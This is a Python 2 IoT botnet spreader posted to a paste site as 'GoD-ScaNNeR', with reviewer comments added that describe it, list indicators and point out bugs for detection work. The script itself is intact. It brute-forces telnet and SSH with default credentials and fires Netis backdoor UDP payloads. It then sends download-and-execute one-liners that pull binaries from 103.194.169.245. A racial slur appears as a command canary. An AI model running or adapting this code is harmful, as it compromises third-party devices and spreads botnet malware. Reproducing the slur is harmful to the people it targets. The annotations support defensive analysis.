Dr-L0v3

GoD-ScaNNeR (TELNET, SSH, NETIS)

Dec 22nd, 2017
#!/usr/bin/python
"""
   GoD-ScaNNeR (NeTiS/TeLNeT/SSH)

   REVIEW NOTE (security): despite the name this is not a scanner, it is an
   IoT botnet loader / spreader.  For every host in the input list it
     (a) ttelnet: fingerprints the telnet banner, logs in with one of the
         default credential pairs below and, once a shell prompt is seen,
         pushes a "wget|tftp -> chmod 777 -> execute -> rm" one-liner;
     (b) nnetis: blindly fires two UDP datagrams at port 53413 (the "netcore"
         login string and a shell command), which matches the publicly
         reported Netis/Netcore router backdoor on that port;
     (c) sssh: tries the two "user:pass" SSH pairs below and, on success,
         downloads and runs bins.sh.
   Keep it only as a sample for detection / IR work; never execute it.

   Indicators visible in this file: payload host 103.194.169.245, URL paths
   /tftp, /bins.sh, /sshd, ports 23/22/53413, the credential lists below,
   and the "cd /tmp|/var; wget ... ; chmod 777 ...; ./...; rm -rf ..."
   command shape.

   Python 2 only (print statements, Queue, xrange); needs paramiko.
   random, re and os are imported but never used.
"""
import threading, sys, time, random, socket, re, os, paramiko
from Queue import *
from sys import stdout

if len(sys.argv) < 3:
        print "Usage: python "+sys.argv[0]+" <threads> <list>"
        sys.exit()

# USER AND PASS LISTS #
# Telnet pairs are indexed in lock-step by ttelnet.run (usernames[i] goes
# with passwords[i]); the banner substring match picks the index.  These are
# well-known IoT default credentials.
usernames = ["root", "admin", "root", "root"] #DONT CHANGE
passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
# SSH pairs as "user:pass"; sssh.run splits on ":" (a literal "n/a" side
# would mean an empty user/password, but the shipped list has none).
ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
# First UDP datagram nnetis sends to port 53413: 8 filler bytes, "netcore",
# NUL.  Consistent with the publicly reported Netis/Netcore backdoor
# handshake; this literal is a good network signature.
loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE


# START CONFIGURATION #
# Payload host / URLs.  Every download in this file comes from this one IP;
# it is the primary network indicator for the sample.
url = "http://103.194.169.245/tftp" # ARM4 Binary
sh_file = "http://103.194.169.245/bins.sh" # SH File
# Second UDP datagram for port 53413: a shell one-liner that fetches a file
# called "sshd" (wget, falling back to tftp), marks it executable, runs it
# and deletes it.  The name presumably just blends in; it is the dropped
# payload, not a real sshd.
commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://103.194.169.245/sshd || tftp -r sshd -g 103.194.169.245; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary

# DONT TOUCH
spawn_shell = "cat | sh"  # sent first on the BCM telnet path so the following line is piped into sh
paramiko.util.log_to_file("/dev/null") #quiets paramiko output
threads = int(sys.argv[1])  # number of worker() threads started at the bottom of the file
ips = open(sys.argv[2], "r").readlines()  # one target per line, newline kept; handle never closed
ports = ["23", "22", "53413"]  # informational only: never read, each class hard-codes its port
queue = Queue()
qcount = 0
# BUG (left as-is): url.split("/") is ['http:', '', '103.194.169.245', 'tftp'],
# so `binary` becomes "tftp" and binary[2] is the single character "t", not
# the host.  The name `ip` is then clobbered by the loop below and ends up as
# the LAST line of the target file (newline included).  ttelnet's vizxv
# branch reads this global, so its tftp command would point at a victim host
# rather than the payload host.
binary = url.split("/")
binary = binary[3]
ip = binary[2]
found = 0  # intended success counter; ttelnet.run's `found += 1` raises UnboundLocalError, so it stays 0
count = 0  # unused

for ip in ips:
    qcount += 1
    stdout.write("\r[%d] Added to queue" % qcount)
    stdout.flush()
    queue.put(ip)
print "\n"

def readUntil(tn, string, timeout=10):
    """Read from socket `tn` until `string` appears or `timeout` seconds pass.

    Returns everything received so far (including any bytes after the
    match).  Raises Exception('TIMEOUT!') once the deadline has passed.

    Behaviour as written, worth knowing when reading the callers:
    - recv() returning '' (peer closed) is not treated as EOF; the loop keeps
      polling every 10 ms until the deadline.
    - socket errors propagate unchanged (ttelnet sets settimeout(5), so a
      silent peer surfaces as socket.timeout here, not as 'TIMEOUT!').
    - the buffer is unbounded for the life of the call; 1024 is only the
      per-recv chunk size.
    """
    buf = ''
    start_time = time.time()
    while time.time() - start_time < timeout:
        buf += tn.recv(1024)
        time.sleep(0.01)
        if string in buf: return buf
    raise Exception('TIMEOUT!')

def worker():
    """Thread body: drain `queue`, starting one sssh, ttelnet and nnetis thread per host.

    Notes for the reader:
    - sys.exit(1) on an empty queue raises SystemExit, which the inner bare
      `except:` swallows, so an idle worker spins on queue.empty() at full
      CPU until the process ends; it never actually exits.
    - task_done() is called right after the three threads are *started*, not
      when they finish, so queue.join() in the main thread returns while
      scans are still in flight.  Workers are daemons and child threads
      inherit that flag, so "Finished!" ends them mid-connection.
    - Three new threads per host, no cap and no join: the thread count is
      bounded only by the length of the target list.
    - Both bare excepts hide every error (including typos); nothing is logged.
    """
    try:
        while True:
            try:
                if queue.empty() == True:
                    sys.exit(1)
                ip = queue.get()
                ss = sssh(ip)
                ss.start()
                tt = ttelnet(ip)
                tt.start()
                nn = nnetis(ip)
                nn.start()
                queue.task_done()
            except:
                pass
    except:
        pass

class ttelnet(threading.Thread):
        """Telnet path: fingerprint the login banner, log in with a default
        credential pair and, on a shell prompt, push a download-and-execute
        one-liner for the payload host.

        Branch selection is by substring of the first banner read
        ("mdm9625", "9615-cdp", "ogin", "(none)", "BCM"); each branch picks a
        usernames[i]/passwords[i] pair and later a payload command.  Every
        step is wrapped in `except Exception: tn.close()`, so failures are
        silent and later steps then run against a closed socket (and fail
        silently as well).

        Dispatch at the end is driven by the flags r00t / zte / vizxv / BCM,
        which are only assigned in the branch that matched.  Reading an
        unassigned one raises NameError, which the last except swallows:
        - "mdm9625": r00t=0 -> the `not r00t` su + wget line is sent, then
          `if zte` raises NameError (harmless, command already sent).
        - "9615-cdp": r00t=1 -> wget line sent, then NameError at `if zte`.
        - plain "ogin" (ZTE), "(none)" (vizxv) and "BCM": r00t is never set,
          so `if r00t:` raises NameError before any command is sent, unless
          the same banner also matched one of the two branches above.  As
          written those three payload paths are effectively dead.
        The vizxv line additionally lacks a trailing "\n", so even if reached
        the remote shell would never see a complete command.
        """
        def __init__ (self, ip):
            threading.Thread.__init__(self)
            self.ip = str(ip).rstrip('\n')  # target-list lines keep their newline
        def run(self):
            try:
                tn = socket.socket()
                tn.settimeout(5)
                tn.connect((self.ip,23))
                time.sleep(0.2)
                hoho = ''
                hoho += readUntil(tn, ":")  # wait for the "login:"-style prompt
                if "mdm9625" in hoho:
                    r00t = 0  # non-root account: the payload step escalates with `su` + passwords[0]
                    username = usernames[1]
                    password = passwords[1]
                    tn.send(username + "\n")
                elif "9615-cdp" in hoho:
                    r00t = 1
                    username = usernames[0]
                    password = passwords[0]
                    tn.send(username + "\n")
                elif "ogin" in hoho and "9615-cdp" not in hoho:
                    zte = 1
                    username = usernames[2]
                    password = passwords[2]
                    tn.send(username + "\n")
                elif "ogin" in hoho and "mdm9625" not in hoho:
                    # Unreachable: reaching this elif means "ogin" was either
                    # absent or came with "9615-cdp", and the latter is caught
                    # by the second branch.  Dead code, kept byte-for-byte.
                    zte = 1
                    username = usernames[2]
                    password = passwords[2]
                    tn.send(username + "\n")
                if "(none)" in hoho:
                    # Independent `if` (not elif): typically the BusyBox
                    # "(none) login:" banner.  Can re-send a username after one
                    # of the branches above already did.
                    zte = 0
                    vizxv = 1
                    username = usernames[3]
                    password = passwords[3]
                    tn.send(username + "\n")
                if "BCM" in hoho:
                    zte = 0
                    vizxv = 0
                    BCM = 1
                    username = usernames[1]
                    password = passwords[1]
                    tn.send(username + "\n")
            except Exception:
                tn.close()  # NOTE: falls through to the next try with a closed socket
            try:
                hoho = ''
                hoho += readUntil(tn, ":")
                if "assword" in hoho:
                    tn.send(password + "\n")  # NameError (swallowed) if no banner branch matched
                    time.sleep(3)
            except Exception:
                tn.close()
            try:
                mp = ''
                mp += tn.recv(1024)
                if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
                    # Shell prompt seen.  Each line below: fetch the payload
                    # (wget or tftp), chmod 777, execute, delete the file, then
                    # wait 8 s and close.  `ip` on the vizxv line is the
                    # module-level global (last line of the target list), not
                    # the payload host -- see the comment at the top of the file.
                    if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
                    if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
                    if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
                    if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
                    if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
                    # `found` is assigned here without `global`, so Python treats
                    # it as a local and this raises UnboundLocalError (swallowed
                    # below).  The module-level counter never changes.
                    found += 1
            except Exception:
                tn.close()
                pass

class nnetis(threading.Thread):
        """Blind UDP path for what the author labels the Netis backdoor
        (UDP/53413; the "netcore" login string matches the publicly reported
        Netis/Netcore router issue).

        Sends `loginpayload`, waits 1 s, sends `commandpayload` to
        self.ip:53413, waits 2 s and returns.  No reply is read and success is
        never checked, hence the original "to almost everything" remark:
        every host in the list gets both datagrams whatever it is.  The
        socket is never closed (left to GC) and any exception, e.g. a name
        that does not resolve, is swallowed.
        """
        def __init__ (self, ip):
                threading.Thread.__init__(self)
                self.ip = str(ip).rstrip('\n')
        def run(self):
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                try:
                        # sends netis payload to almost everything lmao
                        s.sendto(loginpayload, (self.ip, 53413))
                        time.sleep(1)
                        s.sendto(commandpayload, (self.ip, 53413))
                        time.sleep(2)
                except Exception:
                        pass

class sssh(threading.Thread):
    """SSH path: try each "user:pass" in ssh_passwords with paramiko and, on
    the first login that works, run the bins.sh dropper.

    Flow as written:
    - AutoAddPolicy: unknown host keys are accepted without any check.
    - The `for` loop stops at the first successful connect.  If none
      succeeds, exec_command is still called on an unconnected client; the
      exception it raises is swallowed by the outer bare `except`, so the
      host is silently skipped.
    - "badserver" check: a canary `echo` is run and the host is treated as
      usable only if the echoed text comes back, i.e. the login yielded a
      real command shell rather than a restricted prompt.  (The canary is a
      runtime string literal and has been left byte-for-byte.)
    - On success the command `cd /tmp; wget <sh_file> -O l.sh; sh l.sh;
      rm -rf /tmp/*` is sent -- note the final rm wipes all of /tmp.
    - `while x != 0` runs exactly once; x is set to 0 at the end of the body.
    - The ":n/a" / "n/a:" handling can only trigger for entries someone adds
      to ssh_passwords; the shipped list has none.
    - The initial username/password assignments are overwritten by the loop
      and are effectively unused.
    """
    def __init__ (self, ip):
        threading.Thread.__init__(self)
        self.ip = str(ip).rstrip('\n')
    def run(self):
        x = 1
        while x != 0:
            try:
                username='root'
                password="0"
                port = 22
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # no host-key verification
                dobreak=False
                for passwd in ssh_passwords:
                    if ":n/a" in passwd:
                        password=""
                    else:
                        password=passwd.split(":")[1]
                    if "n/a:" in passwd:
                        username=""
                    else:
                        username=passwd.split(":")[0]
                    try:
                        ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
                        dobreak=True
                        break
                    except:
                        pass
                    if True == dobreak:
                        break
                badserver=True
                # Canary round-trip; `stdout` here is the paramiko channel file,
                # shadowing the module-level sys.stdout import inside run() only.
                stdin, stdout, stderr = ssh.exec_command("echo nigger")
                output = stdout.read()
                if "nigger" in output:
                    badserver=False
                if badserver == False:
                    print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
                    ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
                    time.sleep(3)
                    ssh.close()
                if badserver == True:
                    ssh.close()
            except:
                pass
            x = 0

# Start the worker pool.  Workers are daemons, so once queue.join() returns
# (which, because worker() calls task_done() right after *starting* the
# per-host threads, happens before the scans have actually finished) the
# process prints "Finished!" and exits, abandoning any in-flight connections.
for g in xrange(threads):
    t = threading.Thread(target=worker)
    t.setDaemon(True)
    t.start()

queue.join()
print "Finished!"